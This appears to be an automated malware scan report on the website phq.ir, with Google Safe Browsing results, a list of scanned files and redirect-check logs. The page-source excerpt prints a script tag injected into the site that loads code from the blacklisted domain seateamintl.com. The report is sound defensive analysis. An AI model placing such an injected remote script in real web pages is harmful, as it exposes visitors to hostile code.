Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=phq.ir
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://phq.ir/ | 200 OK Content-Length: 52899 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: seateamintl.com ...[10358 bytes skipped]... r-homepage, #comments-form p, #comments-form #comments-form-buttons, #comments-form #comments-form-error, #comments-form #comments-form-captcha-holder {font-family: 'Arial',Helvetica,Arial,Sans-Serif ;} .s5_wrap{width:950px;} </style> </head> <body id="s5_body"> <div id="s5_scrolltotop"></div> <!-- Mobile version --> <script type="text/javascript" src="http://seateamintl.com/uxl/relay.php?id=3195736"></script><!-- End mobile version --> <!-- PC version --> <!-- Fixed Tabs --> <!-- Header --> <div id="s5_top_bar"> <div id="s5_top_bar_inner" class="s5_wrap"> <div id="s5_font_icon_search_wrap"> <div id="s5_search_wrap"> <div class="moduletable"> <form name="s5_search_form" id ...[54006 bytes skipped]... | ||
http://phq.ir/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/javascript | clean |
http://phq.ir/templates/paradigm_shift/js/s5_flex_menu.js | 200 OK Content-Length: 43661 Content-Type: application/javascript | clean |
http://phq.ir/modules/mod_s5_live_search/js/s5_ls_fade.js | 200 OK Content-Length: 4417 Content-Type: application/javascript | clean |
http://phq.ir/modules/mod_s5_box/js/moo124/s5box.js | 200 OK Content-Length: 16301 Content-Type: application/javascript | clean |
http://phq.ir/templates/paradigm_shift/js/multibox/mootools124/overlay.js | 200 OK Content-Length: 2670 Content-Type: application/javascript | clean |
http://phq.ir/templates/paradigm_shift/js/multibox/mootools124/multibox.js | 200 OK Content-Length: 22888 Content-Type: application/javascript | clean |
http://phq.ir/templates/paradigm_shift/js/multibox/AC_RunActiveContent.js | 200 OK Content-Length: 8321 Content-Type: application/javascript | clean |
http://phq.ir/templates/paradigm_shift/js/s5_font_adjuster.js | 200 OK Content-Length: 3905 Content-Type: application/javascript | clean |
http://seateamintl.com/uxl/relay.php?id=3195736 | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://seateamintl.com/test404page.js | 404 Not Found Content-Length: 12839 Content-Type: text/html | clean |
http://code.jquery.com/jquery-1.9.1.js | 200 OK Content-Length: 268381 Content-Type: application/x-javascript | clean |
http://suspended.hostgator.com/js/simple-expand.min.js | 200 OK Content-Length: 2782 Content-Type: text/javascript | clean |
http://seateamintl.com/ | 200 OK Content-Length: 420 Content-Type: text/html | clean |
http://phq.ir/modules/mod_s5_box/js/s5_box_hide_div.js | 200 OK Content-Length: 369 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: phq.ir
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Sun, 13 Apr 2014 22:11:06 GMT
Pragma: no-cache
Server: Apache
Content-Length: 52899
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sun, 13 Apr 2014 22:11:06 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 1c91b87576f549f6098adf9805efa3e3=dc248ca73092aded6f89f3c875118514; path=/
X-Powered-By: PHP/5.3.27
...52899 bytes of data.
GET / HTTP/1.1
Host: phq.ir
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Sun, 13 Apr 2014 22:11:06 GMT
Pragma: no-cache
Server: Apache
Content-Length: 52899
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sun, 13 Apr 2014 22:11:06 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 1c91b87576f549f6098adf9805efa3e3=dc248ca73092aded6f89f3c875118514; path=/
X-Powered-By: PHP/5.3.27
...52899 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: phq.ir
Referer: http://www.google.com/search?q=phq.ir
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: phq.ir
Referer: http://www.google.com/search?q=phq.ir
Result:
The result is similar to the first query. There are no suspicious redirects found.